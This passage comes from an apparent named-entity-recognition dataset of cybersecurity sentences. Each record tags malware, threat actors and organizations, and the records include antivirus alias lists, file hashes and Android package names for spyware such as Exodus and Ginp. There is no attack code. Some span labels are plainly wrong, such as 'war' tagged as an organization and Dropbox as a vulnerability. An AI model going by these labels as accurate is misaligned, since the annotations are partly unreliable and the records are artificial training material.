e0acbb0d7e55fb67e550a6bf5cf5c499a9960eaf5f037b785f9004585202593b Exodus One Package Names com.phonecarrier.linecheck rm.rf operatore.italia it.offertetelefonicheperte it.servizipremium assistenza.sim assistenza.linea.riattiva assistenza.linea it.promofferte Exodus Two 64c11fdb317d6b7c9930e639f55863df592f23f3c7c861ddd97048891a90c64b a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e Exodus Two ELF Utilities 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f Command & Controls ad1.fbsba [ .", "spans": {"MALWARE: Exodus": [[49, 55]], "MALWARE: Exodus One": [[113, 123], [164, 174], [1085, 1095]], "MALWARE: Exodus Two": [[1278, 1288], [1419, 1429]]}, "info": {"id": "cyner2_train_002711", "source": "cyner2_train"}} {"text": "LOWBALL abuses the Dropbox cloud storage service for command and control CnC.", "spans": {"MALWARE: LOWBALL": [[0, 7]], "VULNERABILITY: Dropbox cloud storage service": [[19, 48]]}, "info": {"id": "cyner2_train_002713", "source": "cyner2_train"}} {"text": "The initial infection vector in this attack is not clear, but it results in installing the Downeks downloader, which in turn infects the victim computer with the Quasar RAT.", "spans": {"MALWARE: the Downeks downloader,": [[87, 110]], "SYSTEM: computer": [[144, 152]], 
"MALWARE: the Quasar RAT.": [[158, 173]]}, "info": {"id": "cyner2_train_002715", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dropper.NSIS Trojan.Zbot.Win32.160494 Win32.Trojan.WisdomEyes.16070401.9500.9957 TROJ_SPNR.15AE15 Trojan-Spy.Win32.Zbot.sbfu Trojan.Win32.Zbot.dtpiom TrojWare.Win32.CnzzBot.DAQ Trojan.Fakealert.47485 TROJ_SPNR.15AE15 Trojan[Spy]/Win32.Zbot.sbfu Trojan-Spy.Win32.Zbot.sbfu TrojanSpy.Zbot W32/CnzzBot.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002716", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGameXEA.Trojan Trojan.Dropper.TJD Trojan.Dropper.TJD Trojan.Dropper.TJD Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/Dropper.AYXX Trojan.Dropper.TJD Worm.Win32.AutoRun.gpog Trojan.Dropper.TJD Trojan.Dropper.TJD Trojan.Win32.Wimpixo Trojan:Win32/Wimpixo.B Trojan:Win32/Wimpixo.B Worm.Win32.AutoRun.gpog BScope.Trojan-Spy.Zbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002717", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-GameThief.Win32.OnLineGames!O Win32.Trojan.WisdomEyes.16070401.9500.9995 Win.Trojan.Mono-15 Trojan.Win32.OnLineGames.fcdid TrojWare.Win32.TrojanSpy.Pophot.d Trojan.PWS.Gamania.5803 BehavesLike.Win32.Ransom.lc Trojan/PSW.OnLineGames.kdn Win32.Hack.UpackT.a.15981 Trojan.Graftor.Elzob.D185D Troj.Heur.bmLerbcan7diu.moF3 Trj/Pupack.A Trojan.Win32.PSW Win32/Trojan.d9e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002718", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Elzob!O Trojan.Crastic.B Trojan.Heur.BmGfrb243Kiib W32.Imaut Trojan.Win32.Popuper.bfzygk Trojan.Popuper.42424 W32.Infostealer.Zeus HEUR/Fakon.mwf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002720", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Trojan.NFEP-4133 Trojan.DownLoader9.29630 DDoS:MSIL/Webxahr.A DDoS.MSIL.Webxahr 
W32/DoSAttack.C!tr Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002721", "source": "cyner2_train"}} {"text": "Dridex has evolved, and now Dridex V4 uses Atom Bombing to perform process injection.", "spans": {"MALWARE: Dridex": [[0, 6]], "MALWARE: Dridex V4": [[28, 37]]}, "info": {"id": "cyner2_train_002723", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Exploit.Vb.R Exploit.Vb Exploit.VB.Win32.18 Trojan.Exploit.Vb.R Win32/Exploit.VB.R TROJ_VB.JUC Trojan.Exploit.Vb.R Exploit.Win32.VB.r Trojan.Exploit.Vb.R Exploit.W32.VB.r!c Trojan.Exploit.Vb.R Trojan.Exploit.Vb.R Trojan.Win32.Exploit Hacktool.SQL.54NB.a TR/Expl.VB.R Trojan[Exploit]/Win32.VB HackTool:Win32/Echoload.A Exploit.Win32.VB.r Trojan.Exploit.Vb.R Exploit.VB Win32.Exploit.Vb.Wsjr Exploit.VB!P1jmyBXhN28 W32/VB.R!exploit Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002724", "source": "cyner2_train"}} {"text": "The Winter Vivern Advanced Persistent Threat APT is a pro-Russian cyber-espionage group that targets government and private businesses, including those involved in the ongoing war in Ukraine.", "spans": {"THREAT_ACTOR: The Winter Vivern Advanced Persistent Threat APT": [[0, 48]], "THREAT_ACTOR: a pro-Russian cyber-espionage group": [[52, 87]], "ORGANIZATION: government": [[101, 111]], "ORGANIZATION: private businesses,": [[116, 135]], "ORGANIZATION: war": [[176, 179]]}, "info": {"id": "cyner2_train_002727", "source": "cyner2_train"}} {"text": "One of the command and control C2 servers that had been dormant for quite some time had suddenly woken up and started distributing what looks to be a new PoS malware family we're calling LockPoS.", "spans": {"MALWARE: new PoS malware family": [[150, 172]], "MALWARE: LockPoS.": [[187, 195]]}, "info": {"id": "cyner2_train_002728", "source": "cyner2_train"}} {"text": "Geopolitical analysts have suggested that the United States may have its own 
interests that involve thwarting Chinese ambitions in the region.", "spans": {"ORGANIZATION: Geopolitical analysts": [[0, 21]], "ORGANIZATION: Chinese ambitions": [[110, 127]]}, "info": {"id": "cyner2_train_002731", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Kryptik.kqs Win32.Trojan.WisdomEyes.16070401.9500.9996 Tool.PassView.1838 Trojan.Kryptik.Win32.1246441 Worm.MSIL.Autorun Trojan.MSIL.Bladabindi.1 Trojan.MSIL.DOTHETUK Trj/CI.A Win32/Trojan.62b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002732", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.DarkKomet.Win32.23088 Trojan.Strictor.DF4F5 Win32.Trojan.WisdomEyes.16070401.9500.9970 Trojan.Win32.Zbot.deisvu Trojan.Hottrend.435 TR/Dropper.xzclg Trojan[Backdoor]/Win32.DarkKomet Trojan:Win32/Rombertik.C Backdoor.DarkKomet Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002733", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ocna Trojan.Win32.Ocna.k Trojan.OcnaCRTD.Win32.4895 TR/RemoteAdmin.tkpmq TrojanDropper:Win32/Jowbaki.A Trojan.Win32.Ocna.k Trojan.Ocna Trj/CI.A Win32/RA-based.AB Win32.Trojan.Ocna.Pgmm Win32/Trojan.388", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002734", "source": "cyner2_train"}} {"text": "I started by trying to find the sample that the blog post analyzed and I was able to find it submitted to the great sandboxing site of Hybrid Analysis Big Shutout to @PayloadSecurity for the great service.", "spans": {"MALWARE: sample": [[32, 38]], "ORGANIZATION: Hybrid Analysis": [[135, 150]], "ORGANIZATION: @PayloadSecurity": [[166, 182]]}, "info": {"id": "cyner2_train_002736", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.ScriptKD.4274 Trojan.ScriptKD.4274 Trojan/Remtasu.f Win32.Trojan.WisdomEyes.16070401.9500.9859 W32/Trojan.QQOQ-8191 Trojan.ScriptKD.4274 Trojan.ScriptKD.4274 BehavesLike.Win32.Trojan.wc W64/Coinminer.N 
Trojan/Win32.Swisyn Trojan.ScriptKD.D10B2 Win32/CoinMiner.AFZ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002737", "source": "cyner2_train"}} {"text": "The malware encrypts files and the boot record of hard disks, leaving behind a ransomware note.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: ransomware": [[79, 89]]}, "info": {"id": "cyner2_train_002738", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.EquationDrug Troj.W32.Equationdrug!c Win32.Trojan.WisdomEyes.16070401.9500.9689 Trojan.Win32.EquationDrug.evztli Trojan.Win32.Z.Equationdrug.102912 Trojan.EquationDrug.85 W32/Trojan.DLSV-8631 W32.Trojan.Equdrug TR/Dropper.bkecf Trojan/Win32.EquationDrug Trojan.EquationDrug.4 Trj/GdSda.A Win32.Trojan.Equationdrug.Pgmi Trojan.EquationDrug! Trojan.Win32.Equdrug Win32/Trojan.6ba", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002740", "source": "cyner2_train"}} {"text": "In February, the source code was reportedly leaked online, which likely spurred some of the recent changes we've observed in the kit.", "spans": {"MALWARE: kit.": [[129, 133]]}, "info": {"id": "cyner2_train_002741", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9872 Bloodhound.Malautoit TR/AD.DelfInject.twazy Trojan:Win32/Regub.A Zum.Locky.1 Zum.Locky.1 Zum.Locky.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002742", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Cossta.icp Trojan.Mikey.D12734 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Banker-13888 Virus.Win32.Lamer.kh Trojan.Win32.A.Cossta.65536.D Win32.Trojan.Cossta.bwce Trojan.DownLoader4.46980 BehavesLike.Win32.Downloader.ch Trojan/Cossta.bii Trojan/Win32.Cossta Win32.RabbitTail.b.2098552 Virus.Win32.Lamer.kh Trojan/Win32.Cossta.R23559 Trojan.Cossta Trojan.Win32.Cossta Win32/Trojan.ed9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_002743", "source": "cyner2_train"}} {"text": "This allowed NoMoreRansom to gain access to many of the decryption keys for the ransomware s victims.", "spans": {"ORGANIZATION: NoMoreRansom": [[13, 25]], "MALWARE: ransomware": [[80, 90]], "ORGANIZATION: victims.": [[93, 101]]}, "info": {"id": "cyner2_train_002744", "source": "cyner2_train"}} {"text": "To date, Sowbug appears to be focused mainly on government entities in South America and Southeast Asia and has infiltrated organizations in Argentina, Brazil, Ecuador, Peru, Brunei and Malaysia.", "spans": {"MALWARE: Sowbug": [[9, 15]], "ORGANIZATION: government": [[48, 58]], "ORGANIZATION: organizations": [[124, 137]]}, "info": {"id": "cyner2_train_002745", "source": "cyner2_train"}} {"text": "Recently, Palo Alto Networks researchers discovered an advanced Android malware we've named SpyDealer which exfiltrates private data from more than 40 apps and steals sensitive messages from communication apps by abusing the Android accessibility service feature.", "spans": {"ORGANIZATION: Palo Alto Networks researchers": [[10, 40]], "MALWARE: advanced Android malware": [[55, 79]], "MALWARE: SpyDealer": [[92, 101]], "SYSTEM: apps": [[151, 155], [205, 209]], "VULNERABILITY: abusing the Android accessibility service feature.": [[213, 263]]}, "info": {"id": "cyner2_train_002746", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hoax.Win32.ArchSMS!O Trojan.ArchSMS.Win32.178 Win32/FakeInstall.BH Win.Trojan.Archsms-882 HEUR:Hoax.Win32.ArchSMS.HEUR Riskware.Win32.ArchSMS.dqovc ApplicUnwnt.Win32.Hoax.ArchSMS.E Tool.SMSSend.117 Trojan-Banker.Win32.Banbra TR/Zen.C HackTool[Hoax]/Win32.ArchSMS Win32.Troj.Hoax.kcloud Trojan:Win32/Moxtrarch.A HEUR:Hoax.Win32.ArchSMS.HEUR Adware.VPets.121105 Hoax.ArchSMS!DSd5P3jaerI W32/ArchSMS.EF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002747", "source": "cyner2_train"}} {"text": "The Rilide stealer is a prime example of the increasing 
sophistication of malicious browser extensions and the dangers they pose.", "spans": {"MALWARE: The Rilide stealer": [[0, 18]], "MALWARE: malicious browser extensions": [[74, 102]]}, "info": {"id": "cyner2_train_002748", "source": "cyner2_train"}} {"text": "The oldest sample we've seen up to now is from November 2013.", "spans": {}, "info": {"id": "cyner2_train_002749", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hacktool.Koobface Win32/Koobface.AKJ Trojan.Win32.Facebfr.cvvcfx Tool.Facebfr BehavesLike.Win32.Swisyn.kh SPR/HackFacebo.A Trojan.Kazy.DA8A0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002750", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Winupnemsys.Trojan Worm.Win32.Mefir!O Win32.Trojan.WisdomEyes.16070401.9500.9998 W32.SillyFDC Win32/Mefir.A Win.Worm.Autorun-316 Worm.Win32.Mefir.a Trojan.Win32.MLW.uvszt Worm.Win32.A.Mefir.143360 Win32.Virus.Mefir.Ectu Worm.Win32.Mefir.B Win32.HLLW.Autoruner.216 Worm.Mefir.Win32.3 Worm/Mefir.f Worm:Win32/Mefir.A Worm:Win32/Mefir.A Worm.Win32.Mefir.a W32/Mefir.A.worm Worm.Mefir!BwUbuvfvViU Worm.Win32.Mefir.a Win32/Trojan.d06", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002751", "source": "cyner2_train"}} {"text": "In the recent weeks, various anti-virus vendors and security researchers published blog posts on this threat, presenting their analysis and findings.", "spans": {"ORGANIZATION: anti-virus vendors": [[29, 47]], "ORGANIZATION: security researchers": [[52, 72]], "MALWARE: threat,": [[102, 109]]}, "info": {"id": "cyner2_train_002752", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Trojan BKDR_MANGZAMEL.B Trojan.Mangzamel.Win32.11 BKDR_MANGZAMEL.B BDS/Vedratve.zgxnw Backdoor:Win32/Vedratve.A!dha Trj/CI.A Win32/Backdoor.f40", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002753", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Symmi.D13C10 
Win32.Trojan.WisdomEyes.16070401.9500.9915 Trojan.Win32.Ekstak.ddqe Trojan.Win32.Ekstak.exahds Trojan.InstallCube.2631 PUA.ICLoader Pua.Downloadmgr Trojan:Win32/Spiltderp.A Trojan.Win32.Ekstak.ddqe Trojan/Win32.Ekstak.R217792 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002755", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exp.OLE.CVE-2009-3129.A Exploit.MSExcel.CVE-2009-3129.ccxskf Exploit.Excel.CVE-2009-3129 Downloader.OLE.HiddenEXE MSExcel/CVE_2009_3129.A!exploit Win32/Trojan.Exploit.19f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002760", "source": "cyner2_train"}} {"text": "A second version 2.1-LNK with the network tag StrangeLove was discovered shortly after.", "spans": {"MALWARE: 2.1-LNK": [[17, 24]], "MALWARE: StrangeLove": [[46, 57]]}, "info": {"id": "cyner2_train_002761", "source": "cyner2_train"}} {"text": "Appendix Samples Some of the latest Ginp samples found in the wild : App name Package name SHA-256 hash Google Play Verificator sing.guide.false 0ee075219a2dfde018f17561467272633821d19420c08cba14322cc3b93bb5d5 Google Play Verificator park.rather.dance 087a3beea46f3d45649b7506073ef51c784036629ca78601a4593759b253d1b7 Adobe Flash Player ethics.unknown.during 5ac6901b232c629bc246227b783867a0122f62f9e087ceb86d83d991e92dba2f Adobe Flash Player solution.rail.forward 7eb239cc86e80e6e1866e2b3a132b5af94a13d0d24f92068a6d2e66cfe5c2cea Adobe Flash Player com.pubhny.hekzhgjty 14a1b1dce69b742f7e258805594f07e0c5148b6963c12a8429d6e15ace3a503c Adobe Flash Player sentence.fancy.humble 78557094dbabecdc17fb0edb4e3a94bae184e97b1b92801e4f8eb0f0626d6212 Target list The current list of apps observed to be targeted by Ginp contains a total of 24 unique applications as seen below .", "spans": {"MALWARE: Ginp": [[36, 40], [804, 808]], "SYSTEM: Google Play Verificator": [[104, 127], [210, 233]], "SYSTEM: park.rather.dance": [[234, 251]], "SYSTEM: Adobe Flash Player": [[317, 335], [423, 441], 
[529, 547], [634, 652]]}, "info": {"id": "cyner2_train_002762", "source": "cyner2_train"}} {"text": "We typically see techniques at this level by well-resourced, well-funded, motivated adversaries.", "spans": {}, "info": {"id": "cyner2_train_002763", "source": "cyner2_train"}} {"text": "Additionally, in all cases, the theft took place using normal cash withdrawals from various ATM terminal locations outside the bank's originating country.", "spans": {}, "info": {"id": "cyner2_train_002764", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit-MSExcel.p Trojan.Mdropper.AA TROJ_MDROP.AH Exploit.MSExcel.CVE-2008-0081.ccxsez Exploit.Excel.1 TROJ_MDROP.AH Exploit-MSExcel.p EXP/Excel.CVE-2008-0081 MSExcel/UDDesc.A!exploit.M20080081 Win32/Trojan.Exploit.903", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002768", "source": "cyner2_train"}} {"text": "A backdoor also known as: Heuristic.LooksLike.Trojan.Dropper.I TrojanDropper:Win32/Datunif.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002770", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Emotet TSPY_EMOTET.SMZD172 Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_EMOTET.SMZD172 Trojan.Packed2.40646 Trojan.Dovs.Win32.2068 BehavesLike.Win32.Backdoor.ch W32.Trojan.Emotet Trojan:Win32/Emotet.R!bit Trojan.Razy.D36CE4 Trojan/Win32.Emotet.R215266 Trojan.Win32.Emotet", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002771", "source": "cyner2_train"}} {"text": "Additional targets have included journalists, political advisors, and organizations associated with political activism in central Asia.", "spans": {"ORGANIZATION: journalists, political advisors,": [[33, 65]], "ORGANIZATION: organizations": [[70, 83]], "ORGANIZATION: political activism": [[100, 118]]}, "info": {"id": "cyner2_train_002772", "source": "cyner2_train"}} {"text": "However, initial static analysis revealed that all of these samples appear to be 
identical on the surface, leading us to believe that we had discovered a new loader.", "spans": {}, "info": {"id": "cyner2_train_002773", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Rimecud.1!O Trojan.Rimecud.U TROJ_RIMECUD.SMX Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_RIMECUD.SMX Trojan.Win32.Fsysna.eqph TrojWare.Win32.Kryptik.AMMN BehavesLike.Win32.PWSZbot.ch Virus.Win32.Cryptor Ransom:Win32/Grymegat.A Trojan.Kazy.D16E7F Trojan.Win32.Fsysna.eqph Trojan/Win32.Jorik.R40701 Trj/Rimecud.f W32/Rimecud.GRC!tr Win32/Trojan.801", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002777", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Exploit/W32.Nuker.203264 Exploit.Nuker Tool.Vai.Win32.1 Exploit.W32.Nuker!c W32/Trojan2.EKA Win.Tool.W32-65 Exploit.Win32.Nuker.Vai.c Exploit.Win32.Nuker-Vai.htmm TrojWare.Win32.Nuker.Vai.C FDOS.VTG.201 W32/Trojan.LISQ-8951 Nuke/Win32.Vai.c Trojan:Win32/VAI.C SPR/DDoS.ICMP.Vait10 Trojan[Exploit]/Win32.Nuker Trojan:Win32/VAI.C Exploit.Win32.Nuker.Vai.c Nuker.Vai Win32/Nuker.Vai.C Win32.Exploit.Nuker.Efbk W32/Nuker_Vai.C!tr Win32/Trojan.Exploit.237", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002778", "source": "cyner2_train"}} {"text": "These malicious Office documents are being spread as an attachment using spear phishing emails as described here.", "spans": {}, "info": {"id": "cyner2_train_002780", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.AutoIt.Pistolar.A Worm.AutoIt.Win32.16752 Trojan.Heur.rmLfrvwRR2pib TROJ_SPNR.03BL13 Win32.Trojan.AutoIt.a TROJ_SPNR.03BL13 Trojan.KillFiles.61768 BehavesLike.Win32.VirRansom.dc Troj.W32.Autoit.lWNh HEUR/Fakon.mwf Win32/Autoit.MB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002781", "source": "cyner2_train"}} {"text": "A backdoor also known as: Infostealer.Limitail Trojan.Win32.Sourtoff.dshygu Trojan.Yakes.Win32.34007 
BehavesLike.Win32.Backdoor.fc Trojan/Injector.cbpj Trojan.Win32.Boaxxe TrojanDropper.Injector.awup TR/Crypt.Xpack.8996 Trojan/Win32.Sourtoff Trojan.Zboter.5 Trojan/Win32.Ransomcrypt.R151582 Trojan.Yakes Trojan.Yakes!LiL7XolSsr0 Win32/Trojan.34b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002782", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.AutoIt Worm.AutoIt.Win32.13406 Win32.Trojan.WisdomEyes.16070401.9500.9999 Worm.Win32.AutoIt.qaw Trojan.Win32.AutoIt.ewujea W32.W.WBNA.lJwt Trojan.MulDrop5.8834 BehavesLike.Win32.Trojan.cz Worm.Win32.AutoRun W32/Trojan.WOLP-1815 Worm/Win32.AutoIt Worm:Win32/Selfita.A Worm.Win32.AutoIt.qaw Worm.AutoIt Win32/AutoRun.VB.BEZ Win32.Worm.Autoit.Pgmr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002784", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clodd7a.Trojan.d028 Trojan-Downloader/W32.Lemmy.65536.B Downloader.Lemmy.Win32.31 Troj.Downloader.W32.Lemmy.u!c Trojan/Downloader.Lemmy.q W32/Lemmy.AO Adware.Roimoi Win32/TrojanDownloader.Lemmy.AA TROJ_LEMMY.L Win.Downloader.71376-1 Trojan-Downloader.Win32.Lemmy.u Trojan.Win32.Lemmy.gugs Trojan.Win32.Downloader.65536.IK[h] TrojWare.Win32.TrojanDownloader.Lemmy.u0 Adware.MediaMotor.130 TROJ_LEMMY.L BehavesLike.Win32.Trojan.kt W32/Lemmy.RFEY-5815 TrojanDownloader.Lemmy.f TR/Dldr.Lemmy.Q.2 W32/Dloader.X!tr Trojan[Downloader]/Win32.Lemmy Win32.Troj.Lemmy.o.kcloud Trojan/Win32.HDC.C89215 TrojanDownloader:Win32/Lemmy.U TScope.Trojan.VB Win32.Trojan-downloader.Lemmy.Egoh Trojan.DL.Lemmy!fetCOQguJic Trojan-Downloader.Win32.Lemmy.q", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002785", "source": "cyner2_train"}} {"text": "A backdoor also known as: WS.Reputation.1 PWS:Win32/Yaludle.D Trojan-PWS.Win32.Yaludle", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002786", "source": "cyner2_train"}} {"text": "Today, we noticed CVE-2015-5119 the identifier 
for this vulnerability being used in a rather unusual attack pattern.", "spans": {}, "info": {"id": "cyner2_train_002789", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom_Necne.R002C0DAU18 Win32.Trojan.WisdomEyes.16070401.9500.9999 Ransom_Necne.R002C0DAU18 Trojan.Win32.Filecoder.eximhz Trojan.Win32.Z.Kelios.56320 Trojan.Encoder.24408 Trojan.Filecoder.Win32.7015 BehavesLike.Win32.Backdoor.qh Trojan-Ransom.FileCoder W32/Trojan.TPMK-1866 TR/AD.Petya.muyif Ransom.Filecoder/Variant Trojan.Encoder Ransom.FileCryptor Trj/GdSda.A W32/Filecoder.FV!tr Win32/Trojan.4af", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002790", "source": "cyner2_train"}} {"text": "In the attached paper we will focus on two exploits which at the time of discovery in the Hacking Team archives were unpatched.", "spans": {"MALWARE: exploits": [[43, 51]], "ORGANIZATION: Hacking Team": [[90, 102]], "VULNERABILITY: unpatched.": [[117, 127]]}, "info": {"id": "cyner2_train_002792", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mikey.DDFDA Ransom_PETYA.SM2 Win32.Trojan.WisdomEyes.16070401.9500.9986 Ransom_PETYA.SM2 Trojan.Win32.AD.epiohw BehavesLike.Win32.Ransom.cc Ransom.Petya Win32/Diskcoder.Petya.E Trojan.Diskcoder! 
Trojan-Ransom.GoldenEye W32/Petya.E!tr.ransom", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002794", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan-Downloader.MSIL.Small.vii Trojan.Win32.Clicker.dckckw Trojan[Downloader]/MSIL.Small Win32.TrojDownloader.MSIL.kcloud Trojan.Kazy.D17F7F Trojan-Downloader.MSIL.Small.vii Trojan:MSIL/Keywsec.B Trojan.Clicker Trojan.Keywsec!MUZFw6FSjt8 Win32/Trojan.419", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002795", "source": "cyner2_train"}} {"text": "During the last weeks there have been several cases of international brand names being used by malware authors to propagate malware through phishing emails.", "spans": {"ORGANIZATION: international brand": [[55, 74]], "THREAT_ACTOR: malware authors": [[95, 110]], "MALWARE: malware": [[124, 131]]}, "info": {"id": "cyner2_train_002797", "source": "cyner2_train"}} {"text": "A backdoor targetting Linux also known as: Exploit.Linux.Vmsplice.A Exploit.Lotoor.Linux.131 HEUR:Exploit.Linux.Lotoor.bh Exploit.Unix.Lotoor.exdfpk Exploit.Linux.Lotoor!c Linux.Exploit.Local.147 Exploit.Linux.auf LINUX/Lotoor.qcvrg Trojan[Exploit]/Linux.Lotoor.bh HEUR:Exploit.Linux.Lotoor.bh Linux.Exploit.Lotoor.Htmf Trojan.Linux.Exploit Linux/Vmsplice.K!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002798", "source": "cyner2_train"}} {"text": "The attackers used different command and control servers C2s for each malware family, a tactic we believe was meant to thwart attempts to tie the attacks together using infrastructure alone.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "MALWARE: each malware family,": [[65, 85]], "SYSTEM: infrastructure": [[169, 183]]}, "info": {"id": "cyner2_train_002799", "source": "cyner2_train"}} {"text": "This new version comes as an email attachment which is a zip inside a zip before extracting to a .js file in a fake Delivery 
Status Notification, failed to deliver email bounce message.", "spans": {}, "info": {"id": "cyner2_train_002800", "source": "cyner2_train"}} {"text": "Attacks using BigBoss appear likely to have occurred since mid-2015, whereas SillyGoose appears to have been distributed since September 2016.", "spans": {"MALWARE: BigBoss": [[14, 21]], "MALWARE: SillyGoose": [[77, 87]]}, "info": {"id": "cyner2_train_002801", "source": "cyner2_train"}} {"text": "The first method, dubbed proxy-changing is commonly used for HTTP packets inspections.", "spans": {}, "info": {"id": "cyner2_train_002802", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.LovGate.W@mm W32.LovGate.W Win32.LovGate.W@mm Spyware.PasswordStealer W32/Lovgate.W@M Win32.LovGate.E8C19A WORM_LOVGATE.BJ Win32.Trojan.WisdomEyes.16070401.9500.9982 W32/Lovgate.W@mm W32.HLLW.Lovgate.I@mm Win32/Lovgate.AX WORM_LOVGATE.BJ Win.Worm.Lovgate-35 Win32.LovGate.W@mm Trojan.Win32.MultiPacked.dgpeeo Win32.Worm-email.Lovgate.Dwsv Win32.HLLM.Lovgate.based Worm.LovGate.Win32.79 BehavesLike.Win32.PWSZbot.cc W32/Lovgate.W@mm I-Worm/Supkp.a WORM/Lovgate.BK Worm[Email]/Win32.LovGate Worm:Win32/Lovgate.W@mm W32.W.LovGate.kYPD Win32.LovGate.W@mm Win32/LovGate.worm.179200 W32/Lovgate.w@M Worm.Lovgate I-Worm.Lovgate.AP Win32/Lovgate.AP I-Worm.Lovgate.BI Worm.Win32.Lovgate Win32.LovGate.W@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002803", "source": "cyner2_train"}} {"text": "The Trojan may download and execute the following potentially malicious file: %Temp%\\[RANDOM CHARACTERS].dll", "spans": {"MALWARE: Trojan": [[4, 10]]}, "info": {"id": "cyner2_train_002808", "source": 